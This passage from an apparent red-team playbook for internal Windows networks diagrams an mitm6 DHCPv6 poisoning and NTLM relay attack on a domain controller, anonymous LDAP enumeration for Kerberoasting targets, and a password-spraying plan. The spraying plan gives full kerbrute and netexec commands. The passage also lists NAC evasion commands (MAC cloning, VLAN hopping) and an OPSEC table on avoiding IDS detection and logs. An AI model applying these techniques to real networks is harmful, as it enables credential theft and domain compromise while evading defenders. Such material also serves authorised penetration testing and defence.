style D fill:#00ff00
style F fill:#ff0000
style N fill:#ffcc00
style O fill:#00ff00mitm6 + NTLM Relay Attack Flow
sequenceDiagram
participant Attacker
participant mitm6
participant Victim
participant ntlmrelayx
participant DC
Attacker->>mitm6: Start mitm6 -d domain.local
Attacker->>ntlmrelayx: Start ntlmrelayx -t ldaps://DC
Note over Victim: Windows sends DHCPv6 Solicit
Victim->>mitm6: DHCPv6 Solicit (broadcast)
mitm6->>Victim: DHCPv6 Advertisement (Attacker as DNS)
Note over Victim: Victim configures attacker as DNS server
Victim->>mitm6: DNS query for WPAD
mitm6->>Victim: DNS response: WPAD = Attacker IP
Victim->>ntlmrelayx: HTTP GET http://attacker/wpad.dat
ntlmrelayx->>Victim: 401 Unauthorized (trigger NTLM auth)
Note over Victim: Victim sends NTLM auth
Victim->>ntlmrelayx: NTLM Type 1 (Negotiate)
ntlmrelayx->>DC: Relay NTLM Type 1 to LDAPS
DC->>ntlmrelayx: NTLM Type 2 (Challenge)
ntlmrelayx->>Victim: Forward Challenge
Victim->>ntlmrelayx: NTLM Type 3 (Auth with hash)
ntlmrelayx->>DC: Relay NTLM Type 3 to LDAPS
Note over ntlmrelayx,DC: Authenticated LDAP session as Victim
ntlmrelayx->>DC: LDAP queries (dump AD info)
DC->>ntlmrelayx: User, Group, Computer data
ntlmrelayx->>DC: Add computer account (if permissions)
ntlmrelayx->>Attacker: Save loot to loot/ directory
Note over Attacker: Got: AD dump, possibly new machine accountAnonymous LDAP Enumeration Flow
graph TD
A["Connect to DC
Port 389 LDAP
No credentials"] --> B{Anonymous Bind Allowed?}
B -->|"Access Denied"| C["End: LDAP requires auth
(Common on 2019+)"]
B -->|"Success"| D["Anonymous LDAP Bind
Established"]
D --> E["Query Base DN
(Get domain structure)"]
E --> F["LDAP Enumeration Queries"]
F --> G["Enumerate Users
(objectClass=user)"]
F --> H["Enumerate Groups
(objectClass=group)"]
F --> I["Enumerate Computers
(objectClass=computer)"]
F --> J["Enumerate Domain Controllers
(userAccountControl:1.2.840.113556.1.4.803:=8192)"]
F --> K["Find Service Accounts
(servicePrincipalName=*)"]
G --> L["Extract User Attributes
(sAMAccountName, description,
memberOf, pwdLastSet)"]
H --> M["Extract Group Members
(member, memberOf)"]
I --> N["Extract Computer Info
(dNSHostName, operatingSystem)"]
K --> O["SPN List for Kerberoasting"]
L --> P["Build Target List"]
M --> P
N --> P
O --> P
P --> Q["Next: AS-REP Roast or
Password Spray"]
style D fill:#00ff00
style C fill:#ff0000
style P fill:#ffcc00
style Q fill:#00ff00Password Spraying Decision Tree
graph TB
A["Start: Have Valid Usernames
(from null session/LDAP)"] --> B["Check Password Policy
(Lockout threshold?)"]
B --> C{Lockout Policy}
C -->|"No Lockout"| D["Safe to Spray
(Still go slow)"]
C -->|"5+ attempts"| E["Moderate Risk
(Use 3 attempts max)"]
C -->|"3 or fewer"| F["HIGH RISK
(Use 1 attempt, long delays)"]
D --> G["Select Password
(Season+Year, Company+123)"]
E --> G
F --> G
G --> H["Spray Method"]
H --> I["Kerbrute
(Faster, less logged)"]
H --> J["NetExec SMB
(More features)"]
I --> K["./kerbrute passwordspray
--dc DC_IP users.txt 'Winter2026!'"]
J --> L["netexec smb DC_IP -u users.txt
-p 'Winter2026!' --no-bruteforce"]
K --> M{Hit?}
L --> M
M -->|"No Hits"| N["Wait Observation Window
(Lockout reset time)"]
M -->|"Valid Creds Found"| O["STOP Spraying
First Credential Obtained"]
N --> P["Next Password Attempt"]
P --> G
O --> Q["Use Creds for:
- Kerberoasting
- BloodHound
- SMB Access"]
style F fill:#ff0000
style O fill:#00ff00
style Q fill:#00ff0014. NAC (Network Access Control) Evasion Techniques
Network Access Control systems gate physical network access. These techniques bypass common NAC implementations.
NAC Evasion Decision Tree
IF 802.1X IS PRESENT:
├── Check for MAB (MAC Auth Bypass) fallback
│ └── Clone a known device MAC (printer, phone, IoT)
│ macchanger -m AA:BB:CC:DD:EE:FF eth0
│ # Find MACs: check stickers on VoIP phones, printers
│
├── Check for unmanaged switch ports
│ └── Conference rooms, printer ports, IP phones
│
├── VLAN hopping (if trunking misconfigured)
│ └── yersinia -I eth0 -G # GUI for VLAN attacks
│ frogger.sh # DTP-based VLAN hopping
│ voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' # Hop to voice VLAN
│
├── NAC bypass via IP phone
│ └── Some phones pass through traffic untagged
│ Plug into phone, bridge through
│ NAC Pi technique: Raspberry Pi MitM between device and switch
│
└── Captive portal bypass
└── Clone MAC of authenticated device
Spoof DNS responses
OPSEC Notes:
- MAC spoofing is detectable if duplicate MACs appear on network
- VLAN hopping generates CDP/DTP packets that some switches log
- IP phone passthrough is quieter but requires physical access to phone
- Always test NAC bypass during off-hours first
15. Enhanced OPSEC Risk Matrix
This expanded matrix includes unauthenticated techniques with network signatures, IDS detection, and log generation details.
| Technique | OPSEC Risk | Network Signature | IDS/Snort Detection | Logs Generated |
|---|---|---|---|---|
| Parse ARP/DNS cache | 🟢 ZERO | None | None | None |
| Responder Analyze mode | 🟢 ZERO | Passive listening only | None | None |
| Network sniffing | 🟢 ZERO | Promiscuous mode (detectable by host) | None | None |
| LDAP anonymous bind | 🟡 LOW | Standard LDAP query | Unusual if not from server | DC event logs |
| DNS zone transfer | 🟡 LOW | AXFR request | alert tcp any any -> any 53 (content:"AXFR") |
DNS server logs |
| SMB null session | 🟡 MEDIUM | Anonymous logon event | ET POLICY SMB Null Session |
Event 4624 Type 3 (anonymous) |
| SNMP community guessing | 🟡 MEDIUM | Multiple SNMP requests | alert udp any any -> any 161 |
SNMP trap logs |
| Kerberos user enum | 🟡 MEDIUM | Multiple AS-REQ to KDC | ET POLICY Kerberos |
Event 4768 (pre-auth failures) |
| Responder poisoning | 🔴 HIGH | Spoofed responses on wire | ET POLICY LLMNR Query, NBNS detection |
Network IDS, SIEM correlation |
| mitm6 DHCPv6 | 🔴 HIGH | Rogue DHCPv6 + DNS | DHCPv6 rogue server detection | DHCP logs, DNS logs |
| ARP spoofing | 🔴 HIGH | Duplicate MAC, gratuitous ARP | arpwatch, DAI (Dynamic ARP Inspection) |
Switch port security logs |
| ntlmrelayx | 🔴 HIGH | Auth from unexpected source | SMB/LDAP from wrong IP | Event 4624 from relay source |
| Coerced auth (PetitPotam) | 🔴 HIGH | EfsRpcOpenFileRaw calls | ET EXPLOIT PetitPotam |
Event 4624, EFSRPC logs |